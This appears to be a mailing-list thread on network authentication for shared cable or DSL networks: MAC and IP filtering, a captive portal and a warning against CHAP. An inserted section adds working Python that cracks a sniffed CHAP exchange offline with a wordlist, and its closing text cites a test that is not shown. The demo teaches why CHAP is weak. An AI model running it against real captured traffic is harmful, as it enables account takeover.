There are more security issues that are a tad more difficult to solve. The primary one is the security of routing protocols, and IPSec is not a solution for that. There is still some research to be done in this area.
Besides, unless one solves the scalability and ease-of-management issues with end-to-end IPSec, wide adoption will not happen.
What kind of authentication you can implement depends on what information about the user you have.
It seems you have MAC addresses of your customers. So you can filter via MAC. Since DHCP can associate MAC and IP address, you can also filter IPs. Is there a way the users can update their MAC addresses if it changes? In that case you would have some kind of username/password based accounts. Probably stored in a RADIUS database.
If the above is true, then you might want to visit http://www.stockholmopen.net (I hope I got the site right). It is meant for wireless networks, but actually is agnostic of what kind of network is in use. Good for shared media networks, such as cable. Authenticates users using username and password (over a secure HTTPS link), and does access control through IP and MAC. You can throw out bits you don't want.
The premise is that the DHCP server will dole out addresses to the clients, but the router will not forward any packets until the user is authenticated. Runs on Linux, but can be configured for other Unices with ipfilter/ipfw-like firewall control.
--
Parijat
I assume one would have to use PPPoE or PPTP to deploy PPP over a DSL/Cable network.
In this case, one should be careful not to use CHAP as the authentication mechanism. It is not suitable for IP networks and there are known (and easy) attacks against it.
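One of the well-known attacks on CHAP that the previous post refers to, as an added example that is not part of the original post: a passive listener on the shared medium captures the Challenge and Response (RFC 1994: Response = MD5(Identifier || secret || Challenge)) and tests candidate secrets offline, with no further contact with the server. The secret, identifier, challenge and wordlist below are constructed for the demo; the function names are assumptions.

```python
"""CHAP (RFC 1994) response computation and the offline dictionary attack
a sniffer can run against one captured exchange. Added example, not the
post's own material. All inputs are constructed."""
import hashlib
import hmac
from typing import Iterable, Optional


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 section 2: Value = MD5(Identifier || secret || Challenge)."""
    if not 0 <= identifier <= 0xFF:
        raise ValueError("CHAP Identifier is a single octet")
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


def chap_verify(identifier: int, secret: bytes, challenge: bytes,
                response: bytes) -> bool:
    """What the authenticator does; note it needs the plaintext secret."""
    return hmac.compare_digest(chap_response(identifier, secret, challenge), response)


def dictionary_attack(identifier: int, challenge: bytes, response: bytes,
                      wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline guess-and-check over a sniffed exchange. Every guess is a
    local MD5; no lockout, rate limit or log entry on the server side."""
    for cand in wordlist:
        if chap_response(identifier, cand, challenge) == response:
            return cand
    return None


# Constructed exchange: what a sniffer on the segment would have captured.
CAPTURED_ID = 0x17
CAPTURED_CHALLENGE = bytes.fromhex("8a3c55f1e2b7094d6c1a0ffe9b2d4711")
CAPTURED_RESPONSE = chap_response(CAPTURED_ID, b"summer2001", CAPTURED_CHALLENGE)

# Constructed wordlist; a real one would be far larger but works the same way.
WORDLIST = [b"password", b"letmein", b"summer2000", b"summer2001", b"qwerty"]


def demo() -> Optional[bytes]:
    return dictionary_attack(CAPTURED_ID, CAPTURED_CHALLENGE, CAPTURED_RESPONSE, WORDLIST)


if __name__ == "__main__":
    print(demo())  # b'summer2001'
```

The challenge does stop straight replay (a captured response is useless under a fresh challenge, as the test below checks), but it does nothing against guessing once the exchange is in hand, and the authenticator side has to hold every secret in recoverable form to compute the same MD5. Both points are why a weak per-subscriber password is fatal on a medium where everyone can hear everyone else.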